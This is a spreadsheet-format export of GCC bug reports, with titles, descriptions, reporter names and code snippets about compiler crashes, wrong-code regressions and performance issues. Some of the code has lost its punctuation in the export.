Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --disable-plugin --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=x86_64-redhat-linux
Thread model: posix
gcc version 4.1.2 20080704 (Red Hat 4.1.2-50)
Unfortunately I don't have a newer gcc available right now for testing.</t>
  </si>
  <si>
    <t>doriankrause</t>
  </si>
  <si>
    <t>GCC-8405</t>
  </si>
  <si>
    <t>GCC 3.2: 'throw exception' not caught by catch</t>
  </si>
  <si>
    <t>Calling the following function
void f() throw(std::string)
{
  throw exception
}
aborts the program. It would seem that the char array exception must be coerced to a string-object but this is clearly not the case here.
By the way GCC 2.95 has the same behavior and I didn't check the earlier versions.
I have no certainty as to whether this presents a bug or just a feature but in either case it is quite frustrating to deal with.
Release:
GCC 3.2
Environment:
Sun OS Windows 2000 with Pentium 3 Cygwin under W2000/P3
How-To-Repeat:
#include 
#include 
void f() throw(std::string)
{
  throw exception
}
int main()
{
  try {
    f()
  }
  catch(...) {
    std::cout &lt;&lt; Exception caught. &lt;&lt; std::endl
    // The string exception does not get caught
    // which aborts the program.
  }
  return 0
}</t>
  </si>
  <si>
    <t>dobrynin</t>
  </si>
  <si>
    <t>GCC-32941</t>
  </si>
  <si>
    <t>[4.3 regression] Bootstrap comparison failure</t>
  </si>
  <si>
    <t>Bootstraping is failing for me on i686-pc-linux-gnu. At 23.07.2007 bootstrapping was successfull but yesterday and today it fails
configure flags: --enable-languages=adacc++fortranjavaobjcobj-c++treelang --with-mpfr=/usr/local
Here is the error message:
make[5]: Leaving directory `/data/usr_local/xxxxxx/gccobj/i686-pc-linux-gnu/libgcc'
make[4]: Leaving directory `/data/usr_local/xxxxxx/gccobj/i686-pc-linux-gnu/libgcc'
make[3]: Leaving directory `/data/usr_local/xxxxxx/gccobj/i686-pc-linux-gnu/libgcc'
make[2]: Leaving directory `/data/usr_local/xxxxxx/gccobj'
make DESTDIR= RPATH_ENVVAR=LD_LIBRARY_PATH TARGET_SUBDIR=i686-pc-linux-gnu bindir=/usr/local/bin datadir=/usr/local/share exec_prefix=/usr/local includedir=/usr/local/include datarootdir=/usr/local/share docdir=/usr/local/share/doc infodir=/usr/local/info pdfdir=/usr/local/share/doc htmldir=/usr/local/share/doc libdir=/usr/local/lib libexecdir=/usr/local/libexec lispdir= localstatedir=/usr/local/var mandir=/usr/local/man oldincludedir=/usr/include prefix=/usr/local sbindir=/usr/local/sbin sharedstatedir=/usr/local/com sysconfdir=/usr/local/etc tooldir=/usr/local/i686-pc-linux-gnu build_tooldir=/usr/local/i686-pc-linux-gnu target_alias=i686-pc-linux-gnu BISON=bison CC_FOR_BUILD=gcc CFLAGS_FOR_BUILD=-g -O2 CXX_FOR_BUILD=g++ EXPECT=expect FLEX=flex INSTALL=/usr/bin/install -c INSTALL_DATA=/usr/bin/install -c -m 644 INSTALL_PROGRAM=/usr/bin/install -c INSTALL_SCRIPT=/usr/bin/install -c LEX=flex M4=m4 MAKE=make RUNTEST=runtest RUNTESTFLAGS= SHELL=/bin/sh YACC=bison -y `echo 'ADAFLAGS=' | sed -e s'/[^=][^=]*=$/XFOO=/'` AR_FLAGS=rc `echo 'BOOT_ADAFLAGS=' | sed -e s'/[^=][^=]*=$/XFOO=/'` BOOT_CFLAGS=-g -O2 -fomit-frame-pointer BOOT_LDFLAGS= CFLAGS=-g -O2 CXXFLAGS=-g -O2 LDFLAGS= LIBCFLAGS=-g -O2 LIBCXXFLAGS=-g -O2 -fno-implicit-templates STAGE1_CFLAGS=-g -fkeep-inline-functions STAGE1_CHECKING=--enable-checking=types STAGE1_LANGUAGES=cada GNATBIND=gnatbind GNATMAKE=gnatmake AR_FOR_TARGET=ar AS_FOR_TARGET=as CC_FOR_TARGET=/home/xxxxxx/ul/gccobj/./gcc/xgcc -B/home/xxxxxx/ul/gccobj/./gcc/ -B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem /usr/local/i686-pc-linux-gnu/sys-include CFLAGS_FOR_TARGET=-O2 -g -O2  CPPFLAGS_FOR_TARGET= CXX_FOR_TARGET=/home/xxxxxx/ul/gccobj/./gcc/g++ -B/home/xxxxxx/ul/gccobj/./gcc/ -nostdinc++  -L/home/xxxxxx/ul/gccobj/i686-pc-linux-gnu/libstdc++-v3/src -L/home/xxxxxx/ul/gccobj/i686-pc-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem /usr/local/i686-pc-linux-gnu/sys-include CXXFLAGS_FOR_TARGET=-g -O2  -D_GNU_SOURCE DLLTOOL_FOR_TARGET=dlltool GCJ_FOR_TARGET=/home/xxxxxx/ul/gccobj/./gcc/gcj -B/home/xxxxxx/ul/gccobj/./gcc/ -B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem /usr/local/i686-pc-linux-gnu/sys-include GFORTRAN_FOR_TARGET=/home/xxxxxx/ul/gccobj/./gcc/gfortran -B/home/xxxxxx/ul/gccobj/./gcc/ -B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem /usr/local/i686-pc-linux-gnu/sys-include LD_FOR_TARGET=/usr/lib/gcc/i586-suse-linux/4.1.0/../../../../i586-suse-linux/bin/ld LIPO_FOR_TARGET=lipo LDFLAGS_FOR_TARGET= LIBCFLAGS_FOR_TARGET=-O2 -g -O2  LIBCXXFLAGS_FOR_TARGET=-g -O2  -D_GNU_SOURCE -fno-implicit-templates NM_FOR_TARGET=nm OBJDUMP_FOR_TARGET=objdump RANLIB_FOR_TARGET=ranlib STRIP_FOR_TARGET=strip WINDRES_FOR_TARGET=windres WINDMC_FOR_TARGET=windmc `echo 'LANGUAGES=' | sed -e s'/[^=][^=]*=$/XFOO=/'` LEAN=false CONFIG_SHELL=/bin/sh MAKEINFO=makeinfo --split-size=5000000 --split-size=5000000  compare
make[2]: Entering directory `/data/usr_local/xxxxxx/gccobj'
make[3]: Entering directory `/data/usr_local/xxxxxx/gccobj'
rm -f stage_current
make[3]: Leaving directory `/data/usr_local/xxxxxx/gccobj'
Comparing stages 2 and 3
warning: ./cc1plus-checksum.o differs
warning: ./cc1obj-checksum.o differs
warning: ./cc1-checksum.o differs
warning: ./cc1objplus-checksum.o differs
Bootstrap comparison failure!
./ada/exp_aggr.o differs
make[2]: *** [compare] Fehler 1
make[2]: Leaving directory `/data/usr_local/xxxxxx/gccobj'
make[1]: *** [stage3-bubble] Fehler 2
make[1]: Leaving directory `/data/usr_local/xxxxxx/gccobj'
make: *** [all] Fehler 2</t>
  </si>
  <si>
    <t>andreasmeier80</t>
  </si>
  <si>
    <t>GCC-30656</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE with -ftrapv</t>
  </si>
  <si>
    <t>With gfortran version
GNU Fortran 95 (GCC) 4.3.0 20070125 (experimental)
when compiling the attached source files with
$ ~/gcc/bin/gfortran -ftrapv -c dissipation_coeff.f90 Dissipation_4_3_min_err_coeff.f90 
I receive the error message
gfortran: Internal error: Illegal instruction (program f951)
Please submit a full bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-60357</t>
  </si>
  <si>
    <t>[F08] structure constructor with unspecified values for allocatable components</t>
  </si>
  <si>
    <t>This valid F2008 code is rejected:
    module testmod
    Type A
        integer :: X = 1
        integer allocatable :: y 
    end type A
    end module
    program testerprog
    use testmod
    Type(A) :: Me = A(X=1)
    end program
Compiler error is:
Type(A) :: Me = A(X=1)
               1
Error: No initializer for component 'y' given in the structure constructor at (1)!
However initialization statements are not required for allocatable components.</t>
  </si>
  <si>
    <t>antony</t>
  </si>
  <si>
    <t>GCC-2720</t>
  </si>
  <si>
    <t>cin input truncated if istream.clear() used in cases on ind and ix only</t>
  </si>
  <si>
    <t>Read a file and strings beginning with ind or Ind are truncated (e.g. Indigo is read as igo) and strings beginning with ix where x is any letter except 'n' and the first two characters are dropped (e.g. Ivy is read as y.  See attached source file and input file.  
This only occurs on Linux 2.95.3 and 2.96-81.  This problem does not occur with cygwin 2.95.3-2.
Also you can see that on the lines before the I* strings the last value seems to be read twice if you compare the input with the output.
Release:
gcc 2.95-3 20010315 (release)
Environment:
RH 7.1 not standard RH7.1 gcc that was 2.96-81 but rather the standard release as noted above.
How-To-Repeat:
$ g++ readnames.cpp -o readnames
$ ./readnames &lt; names.lst</t>
  </si>
  <si>
    <t>carlsonjf</t>
  </si>
  <si>
    <t>GCC-44360</t>
  </si>
  <si>
    <t>wrong-code: host-associated procedure wrongly favoured to use-associated one</t>
  </si>
  <si>
    <t>The following provokes the summary must be compiled and run:
      module m1
      contains
       subroutine sub(pvec)
        dimension :: pvec(5)
        print *'good compiler!'
       end subroutine
      end
      module m2
      contains
       subroutine submain
       use m1
       dimension :: qvec(5)
       call sub(qvec) ! here must call sub in module m1
       end subroutine
c      subroutine sub(scal) ! if uncommented complains rank mismatch
       subroutine sub(vec)  ! this one is mistakenly called
       dimension :: vec(5)
       print *'bad compiler!'
       end subroutine
      end
      use m2
      call submain
      end
Best regards
Vittorio Zecca</t>
  </si>
  <si>
    <t>GCC-4107</t>
  </si>
  <si>
    <t>Failure of 23_containers/bitset_shift.cc on cygwin</t>
  </si>
  <si>
    <t>I have had a look at another libstdc++-v3 test failure.
23_containers/bitset_shift.cc fails with:
bitset_shift.s: Assembler messages:
bitset_shift.s:590: Warning: rest of line ignored first ignored character is `*'
In bitset_shift.s we see:
	.section	.data$*_ZZ10random_bitvE1xw
	.align 4
_ZZ10random_bitvE1x:
	.long	1
Similar problem in gcc.dg/asm-fs-1.c (PR 3023) where it is suggested that the problem lies in the cygwin output macros.
Release:
3.1 20010822 (experimental) (i686-pc-cygwin)
Environment:
i686-pc-cygwin</t>
  </si>
  <si>
    <t>GCC-57954</t>
  </si>
  <si>
    <t>AVX missing vxorps (zeroing) before vcvtsi2s %edx slow down AVX code</t>
  </si>
  <si>
    <t>in the following benchmark performances w/o vectorization are poor wrt to expectations
I find out this is due to non zeroing a register before using it 
c++ -O2 -S polyAVX.cpp -mavx
 as -v --64 -o polyAVX.o polyAVX.s
GNU assembler version 2.23.1 (x86_64-redhat-linux-gnu) using BFD version (GNU Binutils) 2.23.1
c++ -O2 polyAVX.o -march=corei7-avx  time ./a.out
53896530759
15.418u 0.000s 0:15.43 99.8%	0+0k 0+0io 1pf+0w
patch polyAVX.s
49a50
&gt;         vxorps          %xmm0%xmm0%xmm0
patching file polyAVX.s
as -v --64 -o polyAVX.o polyAVX.s
GNU assembler version 2.23.1 (x86_64-redhat-linux-gnu) using BFD version (GNU Binutils) 2.23.1
c++ -O2 polyAVX.o -march=corei7-avx  time ./a.out
10340756863
2.958u 0.000s 0:02.96 99.6%	0+0k 0+0io 1pf+0w
I am sure there are many other cases like this.
gcc version 4.9.0 20130718 (experimental) [trunk revision 201034] (GCC) 
cat polyAVX.cpp 
//template
typedef float T
inline T polyHorner(T y) {
  return  T(0x2.p0) + y * (T(0x2.p0) + y * (T(0x1.p0) + y * (T(0x5.55523p-4) + y * (T(0x1.5554dcp-4) + y * (T(0x4.48f41p-8) + y * T(0xb.6ad4p-12)))))) 
}
#include 
#include
volatile unsigned long long rdtsc() {
    unsigned int taux=0
    return __rdtscp(
  }
int main() {
  long long t=0
    bool ret=true
    float s =0
    for (int k=0 k!=100 ++k) {
      float c =   1.f/10000000.f
      t -=rdtsc()
      for (int i=1 i&lt;10000001 ++i) s+= polyHorner((float(i)+float(k))*c)
      t	+=rdtsc()
    }
    ret 
  std::cout &lt;&lt; t &lt;&lt;std::endl
  return ret ? 0 : -1
}</t>
  </si>
  <si>
    <t>GCC-7486</t>
  </si>
  <si>
    <t>ice when compiling glibc 2.2.5 with -msse2</t>
  </si>
  <si>
    <t>When compiling file stdlib/strtod.c from glibc 2.2.5 (default config except for CFLAGS) with gcc 3.1 using -O2 or -O3 and -msse2 or -march=pentium4 function __strtod_internal (1562) causes an reproducible ice in gcc/config/i386/i386.c function ix86_secondary_memory_needed (12251).
Release:
3.1
Environment:
i686
How-To-Repeat:
See descr.</t>
  </si>
  <si>
    <t>GCC-63173</t>
  </si>
  <si>
    <t>performance problem with simd intrinsics vld2_dup_* on aarch64-none-elf</t>
  </si>
  <si>
    <t>Hi
I found there is a performance problem with some simd intrinsics
(vld2_dup_*) on aarch64-none-elf. Now the vld2_dup_* are defined as
follows:
#define __LD2R_FUNC(rettype structtype ptrtype \
    regsuffix funcsuffix Q) \
  __extension__ static __inline rettype \
  __attribute__ ((__always_inline__))  \
  vld2 ## Q ## _dup_ ## funcsuffix (const ptrtype *ptr) \
  { \
    rettype result \
    __asm__ (ld2r {v16. #regsuffix  v17. #regsuffix } %1\n\t \
     st1 {v16. #regsuffix  v17. #regsuffix } %0\n\t \
     : =Q(result) \
     : Q(*(const structtype *)ptr) \
     : memory v16 v17) \
    return result \
  }
It loads from memory to registers and then store the value of
registers to memory as a result. Such code is terribly low in
performance because of redundant memory visit and limited registers
allocation.
cat test1.c
#include 
int 16x4x2_t foo(int16_t __restrict pDataA
				 int16_t __restrict pDataB)
{
	int 16x4x2_t DataA DataB DataC
	DataA = vld2_dup_s16(pDataA)
	DataB = vld2_dup_s16(pDataB)
	DataC.val[0] = vqadd_s16( DataA.val[0] DataB.val[0] ) 
	DataC.val[1] = vqadd_s16( DataA.val[1] DataB.val[1] ) 
	return DataC
}
aarch64-none-elf-gcc -S -O2 test1.c
cat test1.s
foo:
	sub  sp sp #16
	//start of user assembly
	ld2r {v16.4h v17.4h} [x0]
	st1  {v16.4h v17.4h} [sp]
	//end of user assembly
	ldr  d0 [sp]
	ldr  d1 [sp8]
	//start of user assembly
	ld2r {v16.4h v17.4h} [x1]
	st1  {v16.4h v17.4h} [sp]
	//end of user assembly
	ldr  d2 [sp]
	sqadd v0.4h v0.4h v2.4h
	ldr  d2 [sp8]
	add sp sp 16
	sqadd v1.4h v1.4h v24h
	ret
Some intinsics like vld2_* were similar to vld2_dup_* but now they
are realized by builtin functions.
__extension__ static __inline int16x4x2_t __attribute__ ((__always_inline__))
vld2_s16 (const int16_t * __a)
{
  int16x4x2_t ret
  __builtin_aarch64_simd_oi __o
  __o = __builtin_aarch64_ld2v4hi ((const __builtin_aarch64_simd_hi *) __a)
  ret.val[0] = (int16x4_t) __builtin_aarch64_get_dregoiv4hi (__o 0)
  ret.val[1] = (int16x4_t) __builtin_aarch64_get_dregoiv4hi (__o 1)
  return ret
}
test2.c is similar to test1.c only vld2_dup_s16 is instead of vld2_s16
cat test2.c
#include 
int 16x4x2_t foo (int16_t __restrict pDataA
				 int16_t __restrict pDataB)
{
	int 16x4x2_t DataA DataB DataC
	DataA = vld2_s16(pDataA)
	DataB = vld2_s16(pDataB)
	DataC.val[0] = vqadd_s16( DataA.val[0] DataB.val[0] ) 
	DataC.val[1] = vqadd_s16( DataA.val[1] DataB.val[1] ) 
	return DataC
}
aarch64-none-elf-gcc -S -O2 test2.c
cat test2.s
foo:
	ld2 {v2.4h-v3.4h} [x0]
	ld2 {v4.4h-v5.4h} [x1]
	sqadd v1.4h v5.4h v3.4h
	sqadd v0.4h v4.4h v2.4h
	ret
Could vld2_dup_* also be written with builtin as vld2_* ?</t>
  </si>
  <si>
    <t>fei.yang0953</t>
  </si>
  <si>
    <t>chenshanyaoboy</t>
  </si>
  <si>
    <t>GCC-16376</t>
  </si>
  <si>
    <t>Bit-field promotions</t>
  </si>
  <si>
    <t>[conv.prom] paragraph 3 says that bit-fields are converted to int by the
integral promotions if int can represent all the values of the bit-field.
The following testcase was discussed on the WG14 reflector in January
as illustrating a difference between C compilers (where an unsigned:3
bit-field has a special 3-bit type so is promoted to int) and C++ compilers
(where an unsigned:3 bit-field has type unsigned per [class.bit]) but
[conv.prom] wasn't mentioned in that discussion and as far as I can tell
it means that C++ compilers too should promote the unsigned:3 bit-field to
int.  If not what's wrong in my reading of [conv.prom]?
#include 
int main(void){
  struct bits {
    unsigned int ui3 : 3
  } bits
  int i = -1   /* is a very large positive number as unsigned */
  bits.ui3 = 1u
  if( bits.ui3 &lt; i ){
    (void)printf(ui3 treated as unsigned i promoted to unsigned\n)
  }else{
    (void)printf(ui3 promoted to int (value preserving)\n)
  }
  return 0
}
My reading of [conv.prom] is that bits.ui3 should have been promoted to int
though the statistics from the WG14 reflector were that 29 C++ compilers
converted i to unsigned and only 1 promoted bits.ui3 to int.  There are
still differences between C and C++ for bit-fields of types wider than int.</t>
  </si>
  <si>
    <t>GCC-68684</t>
  </si>
  <si>
    <t>gcc/fortran/resolve.c:8748: bad if test ?</t>
  </si>
  <si>
    <t>../../src/trunk/gcc/fortran/resolve.c:8748:41: warning: logical â€˜andâ€™ of mutually exclusive tests is always false [-Wlogical-op]
Source code is
231208      kargl   else if ((code-&gt;op == EXEC_EVENT_POST &amp;&amp; code-&gt;op == EXEC_EVENT_WAIT)
Maybe adding -Wlogical-op to the fortran build is a good idea.</t>
  </si>
  <si>
    <t>GCC-1412</t>
  </si>
  <si>
    <t>gcj miscompiles some loops with -O2</t>
  </si>
  <si>
    <t xml:space="preserve">From: Jeff Sturm 
To: Bryce McKinlay 
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/381: gcj miscompiles some loops with -O2
Date: Mon 11 Dec 2000 18:26:10 -0500
 Bryce McKinlay wrote:
 &gt; &gt;&gt; Synopsis:       gcj miscompiles some loops with -O2
 &gt; Yeah. This has always been a problem even pre-2.95. Its the reason why
 &gt; we can't turn on -O2 for compiling libgcj. It happens when you use
 &gt; continue in a loop.
 I didn't find the existing PR.  Thanks.
 It seems to me this is pretty important to get good performance out of libgcj.
 In the meantime I'll stick to compiling from bytecode which seems to work fine.
 --
 Jeff Sturm
 jeff.sturm@commerceone.com
</t>
  </si>
  <si>
    <t>jeff.sturm</t>
  </si>
  <si>
    <t>GCC-1486</t>
  </si>
  <si>
    <t>dosen't take good code ICE 122</t>
  </si>
  <si>
    <t>just look at small program it's like 10 lines.  Gives ICE 122.
Release:
2.96
Environment:
RedHat 686</t>
  </si>
  <si>
    <t>none</t>
  </si>
  <si>
    <t>GCC-54070</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Wrong code with allocatable deferred-length (array) function results</t>
  </si>
  <si>
    <t>As reported by Damian at http://gcc.gnu.org/ml/fortran/2012-07/msg00117.html  allocatable deferred-length (array) function results have issues.
The following code gives a segfault - or with tree checking: gfc_add_modify_loc at fortran/trans.c:160
function f()
  character(len=:)allocatable :: f
  f =ABC
end function
The following (invalid) program gives an ICE:
  in gimplify_var_or_parm_decl at gimplify.c:2048
(the program is invalid as one assigns a scalar to an unallocated array)
function f(a)
  character(len=*) :: a
  character(len=:)allocatable :: f(:)
  f = a
end function
One gets the same ICE for the original example. Looking at the dump there is no (re)allocation - but there should be one!
module deferred_length_char_array
contains
  function return_string(argument)
    character(*) :: argument
    character(:) dimension(:) allocatable :: return_string
    return_string = argument
  end function 
end module</t>
  </si>
  <si>
    <t>GCC-49497</t>
  </si>
  <si>
    <t>Incorrect lea peephole</t>
  </si>
  <si>
    <t>i386.md has
 Convert imul by three five and nine into lea
(define_peephole2
  [(parallel
    [(set (match_operand:SWI48 0 register_operand )
          (mult:SWI48 (match_operand:SWI48 1 register_operand )
                      (match_operand:SWI48 2 const_int_operand ))) 
     (clobber (reg:CC FLAGS_REG))])]
  INTVAL (operands[2]) == 3
   || INTVAL (operands[2]) == 5
   || INTVAL (operands[2]) == 9
  [(set (match_dup 0)
        (plus:SWI48 (mult:SWI48 (match_dup 1) (match_dup 2))
                    (match_dup 1)))] 
  operands[2] = GEN_INT (INTVAL (operands[2]) - 1))
(define_peephole2
  [(parallel
    [(set (match_operand:SWI48 0 register_operand )
          (mult:SWI48 (match_operand:SWI48 1 nonimmediate_operand )
                      (match_operand:SWI48 2 const_int_operand ))) 
     (clobber (reg:CC FLAGS_REG))])]
  optimize_insn_for_speed_p ()
   &amp;&amp; (INTVAL (operands[2]) == 3
       || INTVAL (operands[2]) == 5
       || INTVAL (operands[2]) == 9)
  [(set (match_dup 0) (match_dup 1))
   (set (match_dup 0)
        (plus:SWI48 (mult:SWI48 (match_dup 0) (match_dup 2))
                    (match_dup 0)))]
  operands[2] = GEN_INT (INTVAL (operands[2]) - 1))
But lea split has
&amp;&amp; (!TARGET_PARTIAL_REG_STALL || optimize_function_for_size_p (cfun))
When TARGET_PARTIAL_REG_STALL is true get got
[hjl@gnu-33 1036]$ cat x.i
 char *progName
 int *tt
 unsigned char *ll8
 extern void foo (const char *)
 void cleanUpAndFail ( int ec ) {
    __builtin_exit ( ec )
 }
 void uncompressOutOfMemory ( int draw int blockSize ) {
    foo ( \tand failing that find a machine with more memory.\n)
    cleanUpAndFail(1)
 }
 void setDecompressStructureSizes ( int newSize100k ) {
       int n = 100000 * newSize100k
       ll8 = __builtin_malloc ( n * sizeof(unsigned char) )
       if (ll8 == ((void *)0) || tt == ((void *)0)) {
          int totalDraw             = n * sizeof(unsigned char) + n * sizeof(unsigned int)
          uncompressOutOfMemory ( totalDraw n )
       }
 }
[hjl@gnu-33 1036]$ make x.s
/export/build/gnu/gcc/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc/build-x86_64-linux/gcc/ -O2  -S x.i
x.i: In function â€˜setDecompressStructureSizesâ€™:
x.i:19:2: error: unrecognizable insn:
(insn 43 19 21 4 (set (reg:SI 5 di [69])
        (plus:SI (mult:SI (reg/v:SI 3 bx [orig:59 n ] [59])
                (const_int 4 [0x4]))
            (reg/v:SI 3 bx [orig:59 n ] [59]))) x.i:16 -1
     (nil))
x.i:19:2: internal compiler error: in extract_insn at recog.c:2113
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make: *** [x.s] Error 1
[hjl@gnu-33 1036]$</t>
  </si>
  <si>
    <t>GCC-7490</t>
  </si>
  <si>
    <t>[3.2/3.3 regression] ICE with alias definition</t>
  </si>
  <si>
    <t>When compiling code with a macro that defines a block inside of which
is a function declaration with __attribute__ ((__alias__ (other_function)))
the compiler gets a Segmentation fault.
Release:
3.0.4
Environment:
System: Linux shoshin.keithr.com 2.4.18 #56 Sun Jul 7 22:04:16 PDT 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr/local/gcc
How-To-Repeat:
Preprocessed source:
# 1 foo.c
# 1 buffer_protect.h 1
# 2 foo.c 2
# 1 foo.c
# 1 /usr/include/stdlib.h 1 3
# 25 /usr/include/stdlib.h 3
# 1 /usr/include/features.h 1 3
# 250 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 251 /usr/include/features.h 2 3
# 278 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 279 /usr/include/features.h 2 3
# 26 /usr/include/stdlib.h 2 3
# 1 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 1 3
# 199 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 3
typedef unsigned int size_t
# 287 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 3
typedef long int wchar_t
# 34 /usr/include/stdlib.h 2 3
typedef struct
  {
    int quot
    int rem
  } div_t
typedef struct
  {
    long int quot
    long int rem
  } ldiv_t
# 80 /usr/include/stdlib.h 3
extern size_t __ctype_get_mb_cur_max (void) 
extern double atof (__const char *__nptr) 
extern int atoi (__const char *__nptr) 
extern long int atol (__const char *__nptr) 
__extension__ extern long long int atoll (__const char *__nptr) 
extern double strtod (__const char *__restrict __nptr char **__restrict __endptr) 
# 109 /usr/include/stdlib.h 3
extern long int strtol (__const char *__restrict __nptr char **__restrict __endptr int __base) 
extern unsigned long int strtoul (__const char *__restrict __nptr char **__restrict __endptr int __base) 
__extension__
extern long long int strtoq (__const char *__restrict __nptr char **__restrict __endptr int __base) 
__extension__
extern unsigned long long int strtouq (__const char *__restrict __nptr char **__restrict __endptr int __base) 
# 132 /usr/include/stdlib.h 3
__extension__
extern long long int strtoll (__const char *__restrict __nptr char **__restrict __endptr int __base) 
__extension__
extern unsigned long long int strtoull (__const char *__restrict __nptr char **__restrict __endptr int __base) 
# 196 /usr/include/stdlib.h 3
extern double __strtod_internal (__const char *__restrict __nptr char **__restrict __endptr int __group) 
extern float __strtof_internal (__const char *__restrict __nptr char **__restrict __endptr int __group) 
extern long double __strtold_internal (__const char * __restrict __nptr char **__restrict __endptr int __group) 
extern long int __strtol_internal (__const char *__restrict __nptr char **__restrict __endptr int __base int __group) 
extern unsigned long int __strtoul_internal (__const char * __restrict __nptr char **__restrict __endptr int __base int __group) 
__extension__
extern long long int __strtoll_internal (__const char *__restrict __nptr char **__restrict __endptr int __base int __group) 
__extension__
extern unsigned long long int __strtoull_internal (__const char * __restrict __nptr char ** __restrict __endptr int __base int __group) 
# 333 /usr/include/stdlib.h 3
extern char *l64a (long int __n) 
extern long int a64l (__const char *__s) 
# 1 /usr/include/sys/types.h 1 3
# 26 /usr/include/sys/types.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/sys/types.h 2 3
# 1 /usr/include/bits/types.h 1 3
# 26 /usr/include/bits/types.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/bits/types.h 2 3
# 1 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 1 3
# 30 /usr/include/bits/types.h 2 3
typedef unsigned char __u_char
typedef unsigned short __u_short
typedef unsigned int __u_int
typedef unsigned long __u_long
__extension__ typedef unsigned long long int __u_quad_t
__extension__ typedef long long int __quad_t
# 49 /usr/include/bits/types.h 3
typedef signed char __int8_t
typedef unsigned char __uint8_t
typedef signed short int __int16_t
typedef unsigned short int __uint16_t
typedef signed int __int32_t
typedef unsigned int __uint32_t
__extension__ typedef signed long long int __int64_t
__extension__ typedef unsigned long long int __uint64_t
typedef __quad_t *__qaddr_t
typedef __u_quad_t __dev_t
typedef __u_int __uid_t
typedef __u_int __gid_t
typedef __u_long __ino_t
typedef __u_int __mode_t
typedef __u_int __nlink_t
typedef long int __off_t
typedef __quad_t __loff_t
typedef int __pid_t
typedef int __ssize_t
typedef long int __rlim_t
typedef __quad_t __rlim64_t
typedef __u_int __id_t
typedef struct
  {
    int __val[2]
  } __fsid_t
typedef int __daddr_t
typedef char *__caddr_t
typedef long int __time_t
typedef long int __swblk_t
typedef long int __clock_t
typedef unsigned long int __fd_mask
# 100 /usr/include/bits/types.h 3
typedef struct
  {
    __fd_mask __fds_bits[1024 / (8 * sizeof (__fd_mask))]
  } __fd_set
typedef int __key_t
typedef unsigned short int __ipc_pid_t
typedef long int __blkcnt_t
typedef __quad_t __blkcnt64_t
typedef __u_long __fsblkcnt_t
typedef __u_quad_t __fsblkcnt64_t
typedef __u_long __fsfilcnt_t
typedef __u_quad_t __fsfilcnt64_t
typedef __u_long __ino64_t
typedef __loff_t __off64_t
typedef long int __t_scalar_t
typedef unsigned long int __t_uscalar_t
typedef int __intptr_t
# 31 /usr/include/sys/types.h 2 3
typedef __u_char u_char
typedef __u_short u_short
typedef __u_int u_int
typedef __u_long u_long
typedef __quad_t quad_t
typedef __u_quad_t u_quad_t
typedef __fsid_t fsid_t
typedef __loff_t loff_t
typedef __ino_t ino_t
# 58 /usr/include/sys/types.h 3
typedef __dev_t dev_t
typedef __gid_t gid_t
typedef __mode_t mode_t
typedef __nlink_t nlink_t
typedef __uid_t uid_t
typedef __off_t off_t
# 96 /usr/include/sys/types.h 3
typedef __pid_t pid_t
typedef __id_t id_t
typedef __ssize_t ssize_t
typedef __daddr_t daddr_t
typedef __caddr_t caddr_t
typedef __key_t key_t
# 1 /usr/include/time.h 1 3
# 68 /usr/include/time.h 3
# 1 /usr/include/bits/types.h 1 3
# 69 /usr/include/time.h 2 3
typedef __time_t time_t
# 123 /usr/include/sys/types.h 2 3
# 1 /usr/local/gcc/lib/gcc-lib/i686-pc-linux-gnu/3.0.4/include/stddef.h 1 3
# 126 /usr/include/sys/types.h 2 3
typedef unsigned long int ulong
typedef unsigned short int ushort
typedef unsigned int uint
# 169 /usr/include/sys/types.h 3
typedef int int8_t __attribute__ ((__mode__ (__QI__)))
typedef int int16_t __attribute__ ((__mode__ (__HI__)))
typedef int int32_t __attribute__ ((__mode__ (__SI__)))
typedef int int64_t __attribute__ ((__mode__ (__DI__)))
typedef unsigned int u_int8_t __attribute__ ((__mode__ (__QI__)))
typedef unsigned int u_int16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int u_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int u_int64_t __attribute__ ((__mode__ (__DI__)))
typedef int register_t __attribute__ ((__mode__ (__word__)))
# 191 /usr/include/sys/types.h 3
# 1 /usr/include/endian.h 1 3
# 22 /usr/include/endian.h 3
# 1 /usr/include/features.h 1 3
# 23 /usr/include/endian.h 2 3
# 35 /usr/include/endian.h 3
# 1 /usr/include/bits/endian.h 1 3
# 36 /usr/include/endian.h 2 3
# 192 /usr/include/sys/types.h 2 3
# 1 /usr/include/sys/select.h 1 3
# 25 /usr/include/sys/select.h 3
# 1 /usr/include/features.h 1 3
